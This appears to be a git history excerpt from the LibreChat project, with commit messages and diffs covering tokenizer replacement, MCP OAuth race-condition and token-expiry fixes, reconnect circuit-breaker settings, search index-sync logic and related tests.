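  return noneIndexed || unindexed >= threshold;
}
```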
2026-03-12 20:43:23 -04:00
github-actions[bot]
fc6f7a337d
🌍 i18n: Update translation.json with latest translations (#12176)
Co-authored-by: github-actions[bot] <41898282+github-actions[bot]@users.noreply.github.com>
2026-03-11 11:46:55 -04:00
Danny Avila
9a5d7eaa4e
refactor: Replace tiktoken with ai-tokenizer (#12175)
* chore: Update dependencies by adding ai-tokenizer and removing tiktoken

- Added ai-tokenizer version 1.0.6 to package.json and package-lock.json across multiple packages.
- Removed tiktoken version 1.0.15 from package.json and package-lock.json in the same locations, streamlining dependency management.

* refactor: replace js-tiktoken with ai-tokenizer

- Added support for 'claude' encoding in the AgentClient class to improve model compatibility.
- Updated Tokenizer class to utilize 'ai-tokenizer' for both 'o200k_base' and 'claude' encodings, replacing the previous 'tiktoken' dependency.
- Refactored tests to reflect changes in tokenizer behavior and ensure accurate token counting for both encoding types.
- Removed deprecated references to 'tiktoken' and adjusted related tests for improved clarity and functionality.

* chore: remove tiktoken mocks from DALLE3 tests

- Eliminated mock implementations of 'tiktoken' from DALLE3-related test files to streamline test setup and align with recent dependency updates.
- Adjusted related test structures to ensure compatibility with the new tokenizer implementation.

* chore: Add distinct encoding support for Anthropic Claude models

- Introduced a new method `getEncoding` in the AgentClient class to handle the specific BPE tokenizer for Claude models, ensuring compatibility with the distinct encoding requirements.
- Updated documentation to clarify the encoding logic for Claude and other models.

* docs: Update return type documentation for getEncoding method in AgentClient

- Clarified the return type of the getEncoding method to specify that it can return an EncodingName or undefined, enhancing code readability and type safety.

* refactor: Tokenizer class and error handling

- Exported the EncodingName type for broader usage.
- Renamed encodingMap to encodingData for clarity.
- Improved error handling in getTokenCount method to ensure recovery attempts are logged and return 0 on failure.
- Updated countTokens function documentation to specify the use of 'o200k_base' encoding.

* refactor: Simplify encoding documentation and export type

- Updated the getEncoding method documentation to clarify the default behavior for non-Anthropic Claude models.
- Exported the EncodingName type separately from the Tokenizer module for improved clarity and usage.

* test: Update text processing tests for token limits

- Adjusted test cases to handle smaller text sizes, changing scenarios from ~120k tokens to ~20k tokens for both the real tokenizer and countTokens functions.
- Updated token limits in tests to reflect new constraints, ensuring tests accurately assess performance and call reduction.
- Enhanced console log messages for clarity regarding token counts and reductions in the updated scenarios.

* refactor: Update Tokenizer imports and exports

- Moved Tokenizer and countTokens exports to the tokenizer module for better organization.
- Adjusted imports in memory.ts to reflect the new structure, ensuring consistent usage across the codebase.
- Updated memory.test.ts to mock the Tokenizer from the correct module path, enhancing test accuracy.

* refactor: Tokenizer initialization and error handling

- Introduced an async `initEncoding` method to preload tokenizers, improving performance and accuracy in token counting.
- Updated `getTokenCount` to handle uninitialized tokenizers more gracefully, ensuring proper recovery and logging on errors.
- Removed deprecated synchronous tokenizer retrieval, streamlining the overall tokenizer management process.

* test: Enhance tokenizer tests with initialization and encoding checks

- Added `beforeAll` hooks to initialize tokenizers for 'o200k_base' and 'claude' encodings before running tests, ensuring proper setup.
- Updated tests to validate the loading of encodings and the correctness of token counts for both 'o200k_base' and 'claude'.
- Improved test structure to deduplicate concurrent initialization calls, enhancing performance and reliability.
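The deduplicated async preload described above can be sketched as follows. This is a hedged illustration, not the actual LibreChat `Tokenizer`: the class shape, the `loader` parameter, and the encoding objects are all assumptions.

```javascript
// Illustrative sketch of deduplicated async tokenizer initialization.
// Concurrent initEncoding calls for the same encoding share one load promise.
class Tokenizer {
  constructor() {
    /** @type {Map<string, { encode: (text: string) => unknown[] }>} loaded encodings */
    this.encodings = new Map();
    /** @type {Map<string, Promise<object>>} in-flight loads, for deduplication */
    this.pending = new Map();
  }

  /** Preload an encoding; concurrent calls for the same name coalesce. */
  async initEncoding(name, loader) {
    if (this.encodings.has(name)) {
      return this.encodings.get(name);
    }
    if (!this.pending.has(name)) {
      const load = loader().then((enc) => {
        this.encodings.set(name, enc);
        this.pending.delete(name);
        return enc;
      });
      this.pending.set(name, load);
    }
    return this.pending.get(name);
  }

  /** Count tokens; returns 0 if the encoding is uninitialized or errors. */
  getTokenCount(text, name) {
    try {
      const enc = this.encodings.get(name);
      if (!enc) {
        return 0;
      }
      return enc.encode(text).length;
    } catch {
      return 0;
    }
  }
}
```

The `pending` map is what deduplicates concurrent initialization: the second caller gets the first caller's promise instead of triggering a second load.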
2026-03-10 23:14:52 -04:00
Danny Avila
fcb344da47
🛂 fix: MCP OAuth Race Conditions, CSRF Fallback, and Token Expiry Handling (#12171)
* fix: Resolve race conditions in MCP OAuth flow

- Added connection mutex to coalesce concurrent `getUserConnection` calls, preventing multiple simultaneous attempts.
- Enhanced flow state management to retry once when a flow state is missing, improving resilience against race conditions.
- Introduced `ReauthenticationRequiredError` for better error handling when access tokens are expired or missing.
- Updated tests to cover new race condition scenarios and ensure proper handling of OAuth flows.

* fix: Stale PENDING flow detection and OAuth URL re-issuance

PENDING flows in handleOAuthRequired now check createdAt age — flows
older than 2 minutes are treated as stale and replaced instead of
joined. Fixes the case where a leftover PENDING flow from a previous
session blocks new OAuth initiation.
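The join-or-replace decision described above can be sketched as a small pure function. Names (`resolvePendingFlow`, the flow-state fields, and the behavior for non-PENDING states) are hypothetical, not the actual implementation:

```javascript
// Illustrative staleness check for PENDING OAuth flows.
const PENDING_STALE_MS = 2 * 60 * 1000; // flows older than 2 minutes are stale

/**
 * Decide what to do with an existing flow state when OAuth is initiated.
 * @param {{ status: string, createdAt: number } | null} flowState
 * @param {number} [now] - injectable clock for testing
 * @returns {'join' | 'replace' | 'create'}
 */
function resolvePendingFlow(flowState, now = Date.now()) {
  if (!flowState) {
    return 'create'; // no prior flow: start fresh
  }
  if (flowState.status !== 'PENDING') {
    return 'replace'; // finished/failed flows never block new initiation
  }
  const age = now - flowState.createdAt;
  // Fresh PENDING flows are joined; stale leftovers are replaced so a
  // dead flow from a previous session cannot block re-authentication.
  return age > PENDING_STALE_MS ? 'replace' : 'join';
}
```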

authorizationUrl is now stored in MCPOAuthFlowMetadata so that when a
second caller joins an active PENDING flow (e.g., the SSE-emitting path
in ToolService), it can re-issue the URL to the user via oauthStart.

* fix: CSRF fallback via active PENDING flow in OAuth callback

When the OAuth callback arrives without CSRF or session cookies (common
in the chat/SSE flow where cookies can't be set on streaming responses),
fall back to validating that a PENDING flow exists for the flowId. This
is safe because the flow was created server-side after JWT authentication
and the authorization code is PKCE-protected.
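The validation order can be sketched as: CSRF cookie first, then the active-PENDING-flow fallback. This is an illustrative condensation, not the actual callback route; `validateOAuthCallback` and its parameters are invented for the sketch.

```javascript
// Illustrative OAuth-callback validation with PENDING-flow CSRF fallback.
const PENDING_STALE_MS = 2 * 60 * 1000;

/**
 * @param {{ csrfCookieValid: boolean,
 *           flowState: { status: string, createdAt: number } | null,
 *           now?: number }} args
 * @returns {boolean} whether the callback may proceed
 */
function validateOAuthCallback({ csrfCookieValid, flowState, now = Date.now() }) {
  if (csrfCookieValid) {
    return true; // normal path: CSRF cookie round-tripped
  }
  // Fallback for cookie-less SSE/chat flows: require a fresh PENDING flow.
  // Safe because the flow was created server-side after JWT authentication
  // and the authorization code exchange is PKCE-protected.
  if (!flowState || flowState.status !== 'PENDING') {
    return false;
  }
  return now - flowState.createdAt <= PENDING_STALE_MS;
}
```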

* test: Extract shared OAuth test server helpers

Move MockKeyv, getFreePort, trackSockets, and createOAuthMCPServer into
a shared helpers/oauthTestServer module. Enhance the test server with
refresh token support, token rotation, metadata discovery, and dynamic
client registration endpoints. Add InMemoryTokenStore for token storage
tests.

Refactor MCPOAuthRaceCondition.test.ts to import from shared helpers.

* test: Add comprehensive MCP OAuth test modules

MCPOAuthTokenStorage — 21 tests for storeTokens/getTokens with
InMemoryTokenStore: encrypt/decrypt round-trips, expiry calculation,
refresh callback wiring, ReauthenticationRequiredError paths.

MCPOAuthFlow — 10 tests against real HTTP server: token refresh with
stored client info, refresh token rotation, metadata discovery, dynamic
client registration, full store/retrieve/expire/refresh lifecycle.

MCPOAuthConnectionEvents — 5 tests for MCPConnection OAuth event cycle
with real OAuth-gated MCP server: oauthRequired emission on 401,
oauthHandled reconnection, oauthFailed rejection, token expiry detection.

MCPOAuthTokenExpiry — 12 tests for the token expiry edge case: refresh
success/failure paths, ReauthenticationRequiredError, PENDING flow CSRF
fallback, authorizationUrl metadata storage, full re-auth cycle after
refresh failure, concurrent expired token coalescing, stale PENDING
flow detection.

* test: Enhance MCP OAuth connection tests with cooldown reset

Added a `beforeEach` hook to clear the cooldown for `MCPConnection` before each test, ensuring a clean state. Updated the race condition handling in the tests to properly clear the timeout, improving reliability in the event data retrieval process.

* refactor: PENDING flow management and state recovery in MCP OAuth

- Introduced a constant `PENDING_STALE_MS` to define the age threshold for PENDING flows, improving the handling of stale flows.
- Updated the logic in `MCPConnectionFactory` and `FlowStateManager` to check the age of PENDING flows before joining or reusing them.
- Modified the `completeFlow` method to return false when the flow state is deleted, ensuring graceful handling of race conditions.
- Enhanced tests to validate the new behavior and ensure robustness against state recovery issues.

* refactor: MCP OAuth flow management and testing

- Updated the `completeFlow` method to log warnings when a tool flow state is not found during completion, improving error handling.
- Introduced a new `normalizeExpiresAt` function to standardize expiration timestamp handling across the application.
- Refactored token expiration checks in `MCPConnectionFactory` to utilize the new normalization function, ensuring consistent behavior.
- Added a comprehensive test suite for OAuth callback CSRF fallback logic, validating the handling of PENDING flows and their staleness.
- Enhanced existing tests to cover new expiration normalization logic and ensure robust flow state management.

* test: Add CSRF fallback tests for active PENDING flows in MCP OAuth

- Introduced new tests to validate CSRF fallback behavior when a fresh PENDING flow exists without cookies, ensuring successful OAuth callback handling.
- Added scenarios to reject requests when no PENDING flow exists, when only a COMPLETED flow is present, and when a PENDING flow is stale, enhancing the robustness of flow state management.
- Improved overall test coverage for OAuth callback logic, reinforcing the handling of CSRF validation failures.

* chore: imports order

* refactor: Update UserConnectionManager to conditionally manage pending connections

- Modified the logic in `UserConnectionManager` to only set pending connections if `forceNew` is false, preventing unnecessary overwrites.
- Adjusted the cleanup process to ensure pending connections are only deleted when not forced, enhancing connection management efficiency.

* refactor: MCP OAuth flow state management

- Introduced a new method `storeStateMapping` in `MCPOAuthHandler` to securely map the OAuth state parameter to the flow ID, improving callback resolution and security against forgery.
- Updated the OAuth initiation and callback handling in `mcp.js` to utilize the new state mapping functionality, ensuring robust flow management.
- Refactored `MCPConnectionFactory` to store state mappings during flow initialization, enhancing the integrity of the OAuth process.
- Adjusted comments to clarify the purpose of state parameters in authorization URLs, reinforcing code readability.

* refactor: MCPConnection with OAuth recovery handling

- Added `oauthRecovery` flag to manage OAuth recovery state during connection attempts.
- Introduced `decrementCycleCount` method to reduce the circuit breaker's cycle count upon successful reconnection after OAuth recovery.
- Updated connection logic to reset the `oauthRecovery` flag after handling OAuth, improving state management and connection reliability.

* chore: Add debug logging for OAuth recovery cycle count decrement

- Introduced a debug log statement in the `MCPConnection` class to track the decrement of the cycle count after a successful reconnection during OAuth recovery.
- This enhancement improves observability and aids in troubleshooting connection issues related to OAuth recovery.

* test: Add OAuth recovery cycle management tests

- Introduced new tests for the OAuth recovery cycle in `MCPConnection`, validating the decrement of cycle counts after successful reconnections.
- Added scenarios to ensure that the cycle count is not decremented on OAuth failures, enhancing the robustness of connection management.
- Improved test coverage for OAuth reconnect scenarios, ensuring reliable behavior under various conditions.

* feat: Implement circuit breaker configuration in MCP

- Added circuit breaker settings to `.env.example` for max cycles, cycle window, and cooldown duration.
- Refactored `MCPConnection` to utilize the new configuration values from `mcpConfig`, enhancing circuit breaker management.
- Improved code maintainability by centralizing circuit breaker parameters in the configuration file.

* refactor: Update decrementCycleCount method for circuit breaker management

- Changed the visibility of the `decrementCycleCount` method in `MCPConnection` from private to public static, allowing it to be called with a server name parameter.
- Updated calls to `decrementCycleCount` in `MCPConnectionFactory` to use the new static method, improving clarity and consistency in circuit breaker management during connection failures and OAuth recovery.
- Enhanced the handling of circuit breaker state by ensuring the method checks for the existence of the circuit breaker before decrementing the cycle count.

* refactor: cycle count decrement on tool listing failure

- Added a call to `MCPConnection.decrementCycleCount` in the `MCPConnectionFactory` to handle cases where unauthenticated tool listing fails, improving circuit breaker management.
- This change ensures that the cycle count is decremented appropriately, maintaining the integrity of the connection recovery process.

* refactor: Update circuit breaker configuration and logic

- Enhanced circuit breaker settings in `.env.example` to include new parameters for failed rounds and backoff strategies.
- Refactored `MCPConnection` to utilize the updated configuration values from `mcpConfig`, improving circuit breaker management.
- Updated tests to reflect changes in circuit breaker logic, ensuring accurate validation of connection behavior under rapid reconnect scenarios.

* feat: Implement state mapping deletion in MCP flow management

- Added a new method `deleteStateMapping` in `MCPOAuthHandler` to remove orphaned state mappings when a flow is replaced, preventing old authorization URLs from resolving after a flow restart.
- Updated `MCPConnectionFactory` to call `deleteStateMapping` during flow cleanup, ensuring proper management of OAuth states.
- Enhanced test coverage for state mapping functionality to validate the new deletion logic.
2026-03-10 21:15:01 -04:00
Danny Avila
6167ce6e57
🧪 chore: MCP Reconnect Storm Follow-Up Fixes and Integration Tests (#12172)
* 🧪 test: Add reconnection storm regression tests for MCPConnection

Introduced a comprehensive test suite for reconnection storm scenarios, validating circuit breaker, throttling, cooldown, and timeout fixes. The tests utilize real MCP SDK transports and a StreamableHTTP server to ensure accurate behavior under rapid connect/disconnect cycles and error handling for SSE 400/405 responses. This enhances the reliability of the MCPConnection by ensuring proper handling of reconnection logic and circuit breaker functionality.

* 🔧 fix: Update createUnavailableToolStub to return structured response

Modified the `createUnavailableToolStub` function to return an array containing the unavailable message and a null value, enhancing the response structure. Additionally, added a debug log to skip tool creation when the result is null, improving the handling of reconnection scenarios in the MCP service.

* 🧪 test: Enhance MCP tool creation tests for cache and throttle interactions

Added new test cases for the `createMCPTool` function to validate the caching behavior when tools are unavailable or throttled. The tests ensure that tools are correctly cached as missing and prevent unnecessary reconnects across different users, improving the reliability of the MCP service under concurrent usage scenarios. Additionally, introduced a test for the `createMCPTools` function to verify that it returns an empty array when reconnect is throttled, ensuring proper handling of throttling logic.

* 📝 docs: Update AGENTS.md with testing philosophy and guidelines

Expanded the testing section in AGENTS.md to emphasize the importance of using real logic over mocks, advocating for the use of spies and real dependencies in tests. Added specific recommendations for testing with MongoDB and MCP SDK, highlighting the need to mock only uncontrollable external services. This update aims to improve testing practices and encourage more robust test implementations.

* 🧪 test: Enhance reconnection storm tests with socket tracking and SSE handling

Updated the reconnection storm test suite to include a new socket tracking mechanism for better resource management during tests. Improved the handling of SSE 400/405 responses by ensuring they are processed in the same branch as 404 errors, preventing unhandled cases. This enhances the reliability of the MCPConnection under rapid reconnect scenarios and ensures proper error handling.

* 🔧 fix: Implement cache eviction for stale reconnect attempts and missing tools

Added an `evictStale` function to manage the size of the `lastReconnectAttempts` and `missingToolCache` maps, ensuring they do not exceed a maximum cache size. This enhancement improves resource management by removing outdated entries based on a specified time-to-live (TTL), thereby optimizing the MCP service's performance during reconnection scenarios.
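Size/TTL-bounded eviction over timestamp maps, in the spirit of the `evictStale` described above, might look like this. The signature, `MAX_CACHE_SIZE` value, and map shape are assumptions for the sketch:

```javascript
// Illustrative eviction for maps of key -> last-touched timestamp (ms).
const MAX_CACHE_SIZE = 1000;

/**
 * Remove entries older than ttlMs; if the map is still over maxSize,
 * drop the oldest entries until it fits.
 * @param {Map<string, number>} map
 * @param {number} ttlMs
 * @param {number} [maxSize]
 * @param {number} [now] - injectable clock for testing
 */
function evictStale(map, ttlMs, maxSize = MAX_CACHE_SIZE, now = Date.now()) {
  for (const [key, ts] of map) {
    if (now - ts > ttlMs) {
      map.delete(key); // expired by TTL
    }
  }
  if (map.size > maxSize) {
    // Sort ascending by timestamp so the oldest entries are dropped first.
    const oldestFirst = [...map.entries()].sort((a, b) => a[1] - b[1]);
    for (const [key] of oldestFirst.slice(0, map.size - maxSize)) {
      map.delete(key);
    }
  }
}
```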
2026-03-10 17:44:13 -04:00
Danny Avila
c0e876a2e6
🔄 refactor: OAuth Metadata Discovery with Origin Fallback (#12170)
* 🔄 refactor: OAuth Metadata Discovery with Origin Fallback

Updated the `discoverWithOriginFallback` method to improve the handling of OAuth authorization server metadata discovery. The method now retries with the origin URL when discovery fails for a path-based URL, ensuring consistent behavior across `discoverMetadata` and token refresh flows. This change reduces code duplication and enhances the reliability of the OAuth flow by providing a unified implementation for origin fallback logic.

* 🧪 test: Add tests for OAuth Token Refresh with Origin Fallback

Introduced new tests for the `refreshOAuthTokens` method in `MCPOAuthHandler` to validate the retry mechanism with the origin URL when path-based discovery fails. The tests cover scenarios where the first discovery attempt throws an error and the subsequent attempt succeeds, as well as cases where the discovery fails entirely. This enhances the reliability of the OAuth token refresh process by ensuring proper handling of discovery failures.

* chore: imports order

* fix: Improve Base URL Logging and Metadata Discovery in MCPOAuthHandler

Updated the logging to use a consistent base URL object when handling discovery failures in the MCPOAuthHandler. This change enhances error reporting by ensuring that the base URL is logged correctly, and it refines the metadata discovery process by returning the result of the discovery attempt with the base URL, improving the reliability of the OAuth flow.
2026-03-10 16:19:07 -04:00
Oreon Lothamer
eb6328c1d9
🛤️ fix: Base URL Fallback for Path-based OAuth Discovery in Token Refresh (#12164)
* fix: add base URL fallback for path-based OAuth discovery in token refresh

The two `refreshOAuthTokens` paths in `MCPOAuthHandler` were missing the
origin-URL fallback that `initiateOAuthFlow` already had. With MCP SDK
1.27.1, `buildDiscoveryUrls` appends the server path to the
`.well-known` URL (e.g. `/.well-known/oauth-authorization-server/mcp`),
which returns 404 for servers like Sentry that only expose the root
discovery endpoint (`/.well-known/oauth-authorization-server`).

Without the fallback, discovery returns null during refresh, the token
endpoint resolves to the wrong URL, and users are prompted to
re-authenticate every time their access token expires instead of the
refresh token being exchanged silently.

Both refresh paths now mirror the `initiateOAuthFlow` pattern: if
discovery fails and the server URL has a non-root path, retry with just
the origin URL.
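The retry pattern both refresh paths now share can be sketched as follows, assuming a generic `discover(url)` callback; this is not the actual `MCPOAuthHandler.discoverWithOriginFallback` code.

```javascript
// Illustrative origin fallback for OAuth metadata discovery: try the
// path-based URL first, then retry with just the origin if it fails.
async function discoverWithOriginFallback(serverUrl, discover) {
  const url = new URL(serverUrl);
  try {
    const metadata = await discover(url);
    if (metadata) {
      return metadata;
    }
  } catch {
    // fall through to the origin retry below
  }
  // Only retry when the server URL has a non-root path (e.g. /mcp);
  // a root URL has already been tried as-is.
  if (url.pathname !== '/' && url.pathname !== '') {
    return discover(new URL(url.origin));
  }
  return null;
}
```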

Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>

* refactor: extract discoverWithOriginFallback helper; add tests

Extract the duplicated path-based URL retry logic from both
`refreshOAuthTokens` branches into a single private static helper
`discoverWithOriginFallback`, reducing the risk of the two paths
drifting in the future.

Add three tests covering the new behaviour:
- stored clientInfo path: asserts discovery is called twice (path then
  origin) and that the token endpoint from the origin discovery is used
- auto-discovered path: same assertions for the branchless path
- root URL: asserts discovery is called only once when the server URL
  already has no path component

Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>

* refactor: use discoverWithOriginFallback in discoverMetadata too

Remove the inline duplicate of the origin-fallback logic from
`discoverMetadata` and replace it with a call to the shared
`discoverWithOriginFallback` helper, giving all three discovery
sites a single implementation.

Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>

* test: use mock.calls + .href/.toString() for URL assertions

Replace brittle `toHaveBeenNthCalledWith(new URL(...))` comparisons
with `expect.any(URL)` matchers and explicit `.href`/`.toString()`
checks on the captured call args, consistent with the existing
mock.calls pattern used throughout handler.test.ts.

Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>

---------

Co-authored-by: Claude Sonnet 4.6 <noreply@anthropic.com>
2026-03-10 15:04:35 -04:00
matt burnett
ad5c51f62b
⛈️ fix: MCP Reconnection Storm Prevention with Circuit Breaker, Backoff, and Tool Stubs (#12162)
* fix: MCP reconnection stability - circuit breaker, throttling, and cooldown retry

* Comment and logging cleanup

* fix broken tests
2026-03-10 14:21:36 -04:00
165 changed files with 16554 additions and 1463 deletions


@@ -850,3 +850,24 @@ OPENWEATHER_API_KEY=
# Skip code challenge method validation (e.g., for AWS Cognito that supports S256 but doesn't advertise it)
# When set to true, forces S256 code challenge even if not advertised in .well-known/openid-configuration
# MCP_SKIP_CODE_CHALLENGE_CHECK=false
# Circuit breaker: max connect/disconnect cycles before tripping (per server)
# MCP_CB_MAX_CYCLES=7
# Circuit breaker: sliding window (ms) for counting cycles
# MCP_CB_CYCLE_WINDOW_MS=45000
# Circuit breaker: cooldown (ms) after the cycle breaker trips
# MCP_CB_CYCLE_COOLDOWN_MS=15000
# Circuit breaker: max consecutive failed connection rounds before backoff
# MCP_CB_MAX_FAILED_ROUNDS=3
# Circuit breaker: sliding window (ms) for counting failed rounds
# MCP_CB_FAILED_WINDOW_MS=120000
# Circuit breaker: base backoff (ms) after failed round threshold is reached
# MCP_CB_BASE_BACKOFF_MS=30000
# Circuit breaker: max backoff cap (ms) for exponential backoff
# MCP_CB_MAX_BACKOFF_MS=300000
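These variables might be consumed roughly as below, with defaults matching the commented values and the capped exponential backoff they imply. The function and property names are assumptions for illustration, not the actual `mcpConfig` code:

```javascript
// Illustrative parsing of the circuit-breaker env vars with safe defaults.
function readCircuitBreakerConfig(env = process.env) {
  const num = (key, fallback) => {
    const parsed = Number(env[key]);
    // Reject missing, non-numeric, zero, or negative values.
    return Number.isFinite(parsed) && parsed > 0 ? parsed : fallback;
  };
  return {
    maxCycles: num('MCP_CB_MAX_CYCLES', 7),
    cycleWindowMs: num('MCP_CB_CYCLE_WINDOW_MS', 45000),
    cycleCooldownMs: num('MCP_CB_CYCLE_COOLDOWN_MS', 15000),
    maxFailedRounds: num('MCP_CB_MAX_FAILED_ROUNDS', 3),
    failedWindowMs: num('MCP_CB_FAILED_WINDOW_MS', 120000),
    baseBackoffMs: num('MCP_CB_BASE_BACKOFF_MS', 30000),
    maxBackoffMs: num('MCP_CB_MAX_BACKOFF_MS', 300000),
  };
}

/** Exponential backoff with cap once the failed-round threshold is reached (illustrative). */
function computeBackoffMs(cfg, failedRounds) {
  const exp = cfg.baseBackoffMs * 2 ** Math.max(0, failedRounds - cfg.maxFailedRounds);
  return Math.min(exp, cfg.maxBackoffMs);
}
```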


@@ -149,7 +149,15 @@ Multi-line imports count total character length across all lines. Consolidate va
- Run tests from their workspace directory: `cd api && npx jest <pattern>`, `cd packages/api && npx jest <pattern>`, etc.
- Frontend tests: `__tests__` directories alongside components; use `test/layout-test-utils` for rendering.
- Cover loading, success, and error states for UI/data flows.
- Mock data-provider hooks and external dependencies.
### Philosophy
- **Real logic over mocks.** Exercise actual code paths with real dependencies. Mocking is a last resort.
- **Spies over mocks.** Assert that real functions are called with expected arguments and frequency without replacing underlying logic.
- **MongoDB**: use `mongodb-memory-server` for a real in-memory MongoDB instance. Test actual queries and schema validation, not mocked DB calls.
- **MCP**: use real `@modelcontextprotocol/sdk` exports for servers, transports, and tool definitions. Mirror real scenarios, don't stub SDK internals.
- Only mock what you cannot control: external HTTP APIs, rate-limited services, non-deterministic system calls.
- Heavy mocking is a code smell, not a testing strategy.
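The spy-over-mock idea can be illustrated with a hand-rolled spy (all names here are hypothetical; in Jest this role is played by `jest.spyOn`): the real function still runs, and the test asserts only on how it was called.

```javascript
// A spy wraps the real function, records calls, and delegates to the
// original implementation -- unlike a mock, which replaces the logic.
function makeSpy(obj, method) {
  const original = obj[method].bind(obj);
  const calls = [];
  obj[method] = (...args) => {
    calls.push(args);
    return original(...args); // real logic still runs
  };
  return calls;
}

// Hypothetical unit under observation.
const tokenizer = {
  countTokens(text) {
    return text.trim().split(/\s+/).length; // naive whitespace tokenization
  },
};

function summarize(text) {
  return { tokens: tokenizer.countTokens(text) };
}
```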
---


@@ -1,7 +1,6 @@
const DALLE3 = require('../DALLE3');
const { ProxyAgent } = require('undici');
jest.mock('tiktoken');
const processFileURL = jest.fn();
describe('DALLE3 Proxy Configuration', () => {


@@ -14,15 +14,6 @@ jest.mock('@librechat/data-schemas', () => {
};
});
jest.mock('tiktoken', () => {
return {
encoding_for_model: jest.fn().mockReturnValue({
encode: jest.fn(),
decode: jest.fn(),
}),
};
});
const processFileURL = jest.fn();
const generate = jest.fn();


@@ -236,8 +236,12 @@ async function performSync(flowManager, flowId, flowType) {
const messageCount = messageProgress.totalDocuments;
const messagesIndexed = messageProgress.totalProcessed;
const unindexedMessages = messageCount - messagesIndexed;
const noneIndexed = messagesIndexed === 0 && unindexedMessages > 0;
- if (settingsUpdated || unindexedMessages > syncThreshold) {
+ if (settingsUpdated || noneIndexed || unindexedMessages > syncThreshold) {
if (noneIndexed && !settingsUpdated) {
logger.info('[indexSync] No messages marked as indexed, forcing full sync');
}
logger.info(`[indexSync] Starting message sync (${unindexedMessages} unindexed)`);
await Message.syncWithMeili();
messagesSync = true;
@@ -261,9 +265,13 @@ async function performSync(flowManager, flowId, flowType) {
const convoCount = convoProgress.totalDocuments;
const convosIndexed = convoProgress.totalProcessed;
const unindexedConvos = convoCount - convosIndexed;
const noneConvosIndexed = convosIndexed === 0 && unindexedConvos > 0;
- if (settingsUpdated || unindexedConvos > syncThreshold) {
+ if (settingsUpdated || noneConvosIndexed || unindexedConvos > syncThreshold) {
if (noneConvosIndexed && !settingsUpdated) {
logger.info('[indexSync] No conversations marked as indexed, forcing full sync');
}
logger.info(`[indexSync] Starting convos sync (${unindexedConvos} unindexed)`);
await Conversation.syncWithMeili();
convosSync = true;


@@ -462,4 +462,69 @@ describe('performSync() - syncThreshold logic', () => {
);
expect(mockLogger.info).toHaveBeenCalledWith('[indexSync] Starting convos sync (50 unindexed)');
});
test('forces sync when zero documents indexed (reset scenario) even if below threshold', async () => {
Message.getSyncProgress.mockResolvedValue({
totalProcessed: 0,
totalDocuments: 680,
isComplete: false,
});
Conversation.getSyncProgress.mockResolvedValue({
totalProcessed: 0,
totalDocuments: 76,
isComplete: false,
});
Message.syncWithMeili.mockResolvedValue(undefined);
Conversation.syncWithMeili.mockResolvedValue(undefined);
const indexSync = require('./indexSync');
await indexSync();
expect(Message.syncWithMeili).toHaveBeenCalledTimes(1);
expect(Conversation.syncWithMeili).toHaveBeenCalledTimes(1);
expect(mockLogger.info).toHaveBeenCalledWith(
'[indexSync] No messages marked as indexed, forcing full sync',
);
expect(mockLogger.info).toHaveBeenCalledWith(
'[indexSync] Starting message sync (680 unindexed)',
);
expect(mockLogger.info).toHaveBeenCalledWith(
'[indexSync] No conversations marked as indexed, forcing full sync',
);
expect(mockLogger.info).toHaveBeenCalledWith('[indexSync] Starting convos sync (76 unindexed)');
});
test('does NOT force sync when some documents already indexed and below threshold', async () => {
Message.getSyncProgress.mockResolvedValue({
totalProcessed: 630,
totalDocuments: 680,
isComplete: false,
});
Conversation.getSyncProgress.mockResolvedValue({
totalProcessed: 70,
totalDocuments: 76,
isComplete: false,
});
const indexSync = require('./indexSync');
await indexSync();
expect(Message.syncWithMeili).not.toHaveBeenCalled();
expect(Conversation.syncWithMeili).not.toHaveBeenCalled();
expect(mockLogger.info).not.toHaveBeenCalledWith(
'[indexSync] No messages marked as indexed, forcing full sync',
);
expect(mockLogger.info).not.toHaveBeenCalledWith(
'[indexSync] No conversations marked as indexed, forcing full sync',
);
expect(mockLogger.info).toHaveBeenCalledWith(
'[indexSync] 50 messages unindexed (below threshold: 1000, skipping)',
);
expect(mockLogger.info).toHaveBeenCalledWith(
'[indexSync] 6 convos unindexed (below threshold: 1000, skipping)',
);
});
});


@@ -9,7 +9,7 @@ module.exports = {
moduleNameMapper: {
'~/(.*)': '<rootDir>/$1',
'~/data/auth.json': '<rootDir>/__mocks__/auth.mock.json',
- '^openid-client/passport$': '<rootDir>/test/__mocks__/openid-client-passport.js', // Mock for the passport strategy part
+ '^openid-client/passport$': '<rootDir>/test/__mocks__/openid-client-passport.js',
'^openid-client$': '<rootDir>/test/__mocks__/openid-client.js',
},
transformIgnorePatterns: ['/node_modules/(?!(openid-client|oauth4webapi|jose)/).*/'],


@@ -4,9 +4,7 @@ const { Action } = require('~/db/models');
 * Update an action with new data without overwriting existing properties,
 * or create a new action if it doesn't exist.
 *
- * @param {Object} searchParams - The search parameters to find the action to update.
- * @param {string} searchParams.action_id - The ID of the action to update.
- * @param {string} searchParams.user - The user ID of the action's author.
+ * @param {{ action_id: string, agent_id?: string, assistant_id?: string, user?: string }} searchParams
 * @param {Object} updateData - An object containing the properties to update.
 * @returns {Promise<Action>} The updated or newly created action document as a plain object.
 */
@@ -47,10 +45,8 @@ const getActions = async (searchParams, includeSensitive = false) => {
/**
 * Deletes an action by params.
 *
- * @param {Object} searchParams - The search parameters to find the action to delete.
- * @param {string} searchParams.action_id - The ID of the action to delete.
- * @param {string} searchParams.user - The user ID of the action's author.
- * @returns {Promise<Action>} A promise that resolves to the deleted action document as a plain object, or null if no document was found.
+ * @param {{ action_id: string, agent_id?: string, assistant_id?: string, user?: string }} searchParams
+ * @returns {Promise<Action|null>} The deleted action document as a plain object, or null if no match.
 */
const deleteAction = async (searchParams) => {
  return await Action.findOneAndDelete(searchParams).lean();

api/models/Action.spec.js (new file, 250 lines)

@@ -0,0 +1,250 @@
const mongoose = require('mongoose');
const { MongoMemoryServer } = require('mongodb-memory-server');
const { actionSchema } = require('@librechat/data-schemas');
const { updateAction, getActions, deleteAction } = require('./Action');
let mongoServer;
beforeAll(async () => {
mongoServer = await MongoMemoryServer.create();
const mongoUri = mongoServer.getUri();
if (!mongoose.models.Action) {
mongoose.model('Action', actionSchema);
}
await mongoose.connect(mongoUri);
}, 20000);
afterAll(async () => {
await mongoose.disconnect();
await mongoServer.stop();
});
beforeEach(async () => {
await mongoose.models.Action.deleteMany({});
});
const userId = new mongoose.Types.ObjectId();
describe('Action ownership scoping', () => {
describe('updateAction', () => {
it('updates when action_id and agent_id both match', async () => {
